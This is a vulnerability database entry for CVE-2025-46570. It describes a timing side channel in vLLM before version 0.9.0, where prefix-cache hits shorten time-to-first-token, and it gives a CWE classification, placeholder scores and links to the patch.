Executive Summary



This vulnerability is currently undergoing analysis and not all information is available. Please check back soon to view the completed vulnerability summary
Informations
Name CVE-2025-46570 First vendor Publication 2025-05-29
Vendor Cve Last vendor Modification 2025-05-29

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector :
Cvss Base Score N/A Attack Range N/A
Cvss Impact Score N/A Attack Complexity N/A
Cvss Expoit Score N/A Authentication N/A
Calculate full CVSS 2.0 Vectors scores

Detail

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

Original Source

Url : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-46570

CWE : Common Weakness Enumeration

% Id Name
100 % CWE-208 Timing Discrepancy Information Leak

Sources (Detail)

https://github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e...
https://github.com/vllm-project/vllm/pull/17045
https://github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r
Source Url

Alert History

If you want to see full details history, please login or register.
0
Date Informations
2025-05-29 21:20:34
  • First insertion